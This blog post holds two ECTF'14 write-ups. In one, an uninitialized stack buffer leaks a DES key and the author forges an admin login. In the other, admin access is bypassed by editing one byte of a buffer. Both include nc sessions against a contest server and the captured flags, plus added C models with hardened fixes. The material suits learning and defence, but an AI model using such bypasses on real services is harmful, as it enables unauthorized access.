Blog


ECTF'14 was last weekend.
Here is my writeup for the exploitation 400 Seddit:

Seddit has opened a new service to share posts and links through command line. Check it out here.

Hint: A pinch of ____
nc 212.71.235.214 6000 


Let's open the tar and see what the file is.

$ file seddit.tar.gz 
seddit.tar.gz: gzip compressed data, from Unix, last modified: Sat Oct 18 19:24:04 2014
$ tar -xvf seddit.tar.gz 
seddit
$ file seddit
seddit: ELF 64-bit LSB  executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=8ef4bbb0d0d50aab01844f4ec1b310261844a202, stripped

Looks like it is a 64-bit ELF file.
Let's run it and see what it does.

$ chmod +x ./seddit
$ ./seddit
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? ^C



The program allows you to create an account, login, and make posts (which it seems you can't view again later).

Looking in IDA, we can follow the string "flag" and see that if you log in as admin it will print the flag.



Looking at the login function, it appears to call a function with your entered username as an argument.



In here a key file is being opened.



Then a buffer originally containing 'aaaaaaa' is overwritten by concatenating the key read from the file onto it.



And finally the username is DES-encrypted using the concatenated key.



This is returned and compared to the entered password for the user to log in. However, byte_6020C0 (which is the last salt entered when creating an account) is set to 0 before running the encrypt function for the admin.



So the encryption key is 'aaaaaaa' followed by what is read from the file. The next step is to leak the key. Cross-referencing the key filename string, we find that the file is also opened in the make-post function. The other thing to note about the make-post function is that var_50 is only initialized if you choose to make a text post; however, it is printed regardless of the post type.
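As an added example (not code from the writeup or the challenge binary), here is a C model of the bug described above: the post content buffer is written only for text posts but printed for every post, so a link post echoes whatever an earlier call left in that stack region. The stack slot is passed in explicitly and the secret string is a constructed value, so the demo is deterministic instead of relying on real uninitialized memory; the hardened variant clears the buffer on every path.

```c
#include <stdio.h>
#include <string.h>

#define CONTENT_CAP 64

/* Model of the seddit "make post" bug: the content buffer is written
 * only for text posts, but its contents are printed for every post.
 * The stack slot is passed in by the caller so stale data can be
 * simulated deterministically instead of relying on real uninitialized
 * memory (which would be undefined behaviour). */
size_t make_post_vulnerable(char *content, size_t cap, int is_text, const char *text)
{
    if (is_text)
        snprintf(content, cap, "%s", text);
    /* Link posts fall through here: whatever the slot held is "printed". */
    return strlen(content);
}

/* Hardened version: every path starts from a cleared buffer, so a link
 * post can never echo data left behind by an earlier call. */
size_t make_post_fixed(char *content, size_t cap, int is_text, const char *text)
{
    memset(content, 0, cap);
    if (is_text)
        snprintf(content, cap, "%s", text);
    return strlen(content);
}

/* Simulates the frame reuse the writeup observed: an earlier call (the key
 * file read) leaves its data in the same stack region the post content
 * buffer later occupies. Returns 1 if the link post's printed content
 * contains the secret, 0 otherwise. The secret is a constructed value,
 * not the challenge's key. */
int link_post_leaks_secret(int use_fixed)
{
    char slot[CONTENT_CAP];
    snprintf(slot, sizeof slot, "%s", "constructed-secret-key");

    if (use_fixed)
        make_post_fixed(slot, sizeof slot, 0, NULL);
    else
        make_post_vulnerable(slot, sizeof slot, 0, NULL);

    return strstr(slot, "constructed-secret-key") != NULL;
}

int main(void)
{
    printf("vulnerable: link post leaks secret = %d\n", link_post_leaks_secret(0));
    printf("fixed:      link post leaks secret = %d\n", link_post_leaks_secret(1));
    return 0;
}
```

The fix is the single `memset` at the top of the hardened function: initializing on every path, not just the one that happens to fill the buffer, is what stops the stale key from reaching the output. Compiling with `-Wall` and running under Valgrind or MemorySanitizer would flag the original pattern as a read of uninitialized memory.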



When testing on the server, I find that it doesn't seem to leak anything useful.

What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content:  	@
##############################



Then we notice that the salt variable (byte_6020C0) is used here as well. If we increase its length by creating an account with a longer salt, we can successfully leak the key:

What would you like to do? 1

Enter username:asdf

Enter salt:1234567890abcdef 
Your password is: 6d39088cc5fb4495
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 3
Title: asdf
What type of post? (0: Link Only, 1: Text Post)
0

######## POST CREATED ########
## ID: 1
## content: highsec
�[
##############################


So the key is 'highsec'. Now we just need to encrypt. To make sure we use exactly the same encryption routine, we can patch the program using idaPatcher to allow us to create an account as admin.



Now we can make a key file containing 'highsec' and try to create the admin account with a salt of 'aaaaaaa'.

$ echo "highsec" > key
$ ./sedditPatched
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 1

Enter username:admin

Enter salt:aaaaaaa
Your password is: 94140f8339377477
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4


The encryption results in `94140f8339377477`. Now let's try that password on the real server:

$ nc 212.71.235.214 6000
############################################################################
###  Welcome to seddit! - Share you thoughts and links!                 ####
############################################################################
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 2
Enter username:admin
Enter password:94140f8339377477

Logged in as admin! flag{Encryption_is_Not_a_silver_bullet}
#######################
#  1.Create account   #
#  2.Login            #
#  3.Make a post      #
#  4.Exit             #
#######################
What would you like to do? 4



The flag is `Encryption_is_Not_a_silver_bullet`





ECTF'14 was last weekend.
Here is my writeup for the exploitation 250 Potter:

Description
You have been able to get your hands on the flag storing program of ECTF flag system. But you don't have the required libECTFsecret.so file.
Can you still bypass the system?

nc 212.71.235.214 3050 


Let's extract the given zip and see what is inside.

$ file potter.zip
potter.zip: Zip archive data, at least v2.0 to extract
$ unzip potter.zip
Archive:  potter.zip
  inflating: potter                  
$ file potter
potter: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=b2cc6510804360a6a2c08bed2f0f0a0fd25b0abb, not stripped


As expected, the binary can't be run, as it is missing the shared library.

$ chmod 777 ./potter
$ ./potter
./potter: error while loading shared libraries: libECTFsecret.so: cannot open shared object file: No such file or directory


Let's look at the file in IDA.



Both the check_and_load_flag and load_pass functions are not present in the binary, so they must come from the shared library.

We can make our own fake library using these functions to run the binary.

fakeLib.c
#include <stdio.h>
#include <stdlib.h>

/* Stub for the missing library: the real implementation is unknown,
 * so each function just announces that it was called. Return values
 * are added so the functions return something defined. */
int check_and_load_flag(char* flag) {
	puts("check_and_load_flag function call");
	return 0;	/* no flag is loaded by this stub */
}

char* load_pass(char* pass) {
	puts("load_pass function call");
	return NULL;	/* the real library's contract is unknown */
}


Then compile that as a shared library and add it to /usr/lib

$ gcc -c -fpic fakeLib.c
$ gcc -shared -o libECTFsecret.so fakeLib.o
$ sudo cp libECTFsecret.so /usr/lib
$ sudo chmod 755 /usr/lib/libECTFsecret.so 
$ sudo ldconfig


Now we can run potter again and see if it works

$ ./potter
check_and_load_flag function call
load_pass function call
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:^C


Now back in IDA we can look at the 'View flag' option.



The interesting thing here is that 'You do not have admin access!!' is printed when the 50th byte of arg0 does not equal 0x41 ('A').

The same arg0 is then printed to the screen with:



So the admin check is on the 50th byte of the flag buffer. Let's try setting that byte with the 'Set new flag' option.

$ ./potter
check_and_load_flag function call
load_pass function call
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:3
Maximum 25 characters
Format of input is
 (equal to flag[index - 1] = ch, index = 100 finishes editing)
:50 A
Set
:100 A
Want to save the flag?(1/0)
1
Admin access required to set the flag
Admin Access granted
check_and_load_flag function call


So we achieved admin access. Let's test it again with the 'View flag' option:

Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:2



We did not get the warning, but no flag was printed. This is because our library never set a flag.
Let's test this on the real server now.

$ nc 212.71.235.214 3050
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:3
Maximum 25 characters
Format of input is
 (equal to flag[index - 1] = ch, index = 100 finishes editing)
:50 A
Set
:100 A
Want to save the flag?(1/0)
1
Admin access required to set the flag
Admin Access granted
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:2
flag{The_Flying_Phoenix}
Enter the appropriate option
1)Admin access
2)View flag
3)Set new flag
4)Exit
:^C


The flag is `The_Flying_Phoenix`
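As an added example (not code from the writeup, the challenge binary, or the real libECTFsecret.so), here is a C model of what the Potter writeup found: the admin decision is read from the 50th byte of the flag buffer, and the 'Set new flag' editor writes `flag[index - 1] = ch`, so user-controlled data decides authorization. The stub `check_and_load_flag` here goes one step beyond the writeup's fakeLib.c and fills the buffer with a placeholder flag so the 'View flag' path has something to print locally. The 100-byte buffer size, the placeholder flag text, and the `session` struct in the hardened variant are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Assumed buffer size: the editor stops at index 100, so indices 1..99
 * are treated as writable. */
#define FLAG_CAP 100
#define ADMIN_INDEX 50          /* 1-based: the binary tests flag[49] == 'A' */
#define EDIT_DONE_INDEX 100     /* "index = 100 finishes editing" */

/* Stub for the missing library call. The real implementation is unknown;
 * this version fills the buffer with a placeholder so the 'View flag'
 * path has something to print locally. Returns 0 on success. */
int check_and_load_flag(char *flag)
{
    memset(flag, 0, FLAG_CAP);
    snprintf(flag, FLAG_CAP, "%s", "flag{PLACEHOLDER_LOCAL_TEST_FLAG}");
    return 0;
}

/* Model of the binary's check: whoever has 'A' at the 50th byte is admin. */
int has_admin_access(const char *flag)
{
    return flag[ADMIN_INDEX - 1] == 'A';
}

/* Model of the 'Set new flag' editor: flag[index - 1] = ch.
 * Returns 0 on write, 1 when the stop index is given, -1 when out of range. */
int set_flag_byte(char *flag, int index, char ch)
{
    if (index == EDIT_DONE_INDEX)
        return 1;
    if (index < 1 || index >= FLAG_CAP)
        return -1;
    flag[index - 1] = ch;
    return 0;
}

/* Hardened design (assumption, not the challenge's code): the privilege bit
 * lives in session state the editor cannot write, and editing the flag
 * requires that bit to be set beforehand rather than being able to set it. */
struct session {
    char flag[FLAG_CAP];
    int is_admin;
};

int session_has_admin(const struct session *s)
{
    return s->is_admin;
}

int session_set_flag_byte(struct session *s, int index, char ch)
{
    if (!s->is_admin)
        return -1;              /* refuse before touching the buffer */
    return set_flag_byte(s->flag, index, ch);
}

int main(void)
{
    char flag[FLAG_CAP];
    check_and_load_flag(flag);
    printf("before edit: admin=%d flag=%s\n", has_admin_access(flag), flag);
    set_flag_byte(flag, ADMIN_INDEX, 'A');
    printf("after edit:  admin=%d\n", has_admin_access(flag));

    struct session s;
    memset(&s, 0, sizeof s);
    check_and_load_flag(s.flag);
    printf("hardened: edit allowed=%d admin=%d\n",
           session_set_flag_byte(&s, ADMIN_INDEX, 'A') == 0, session_has_admin(&s));
    return 0;
}
```

The two models differ in where the privilege lives: in the first, the same buffer that users may edit is also the source of truth for the access decision, so any write path into it is an authorization bypass; in the second, the decision is read from state that no user-facing operation can reach, and the edit operation checks it first. That separation, not input validation on the byte values, is what closes the hole.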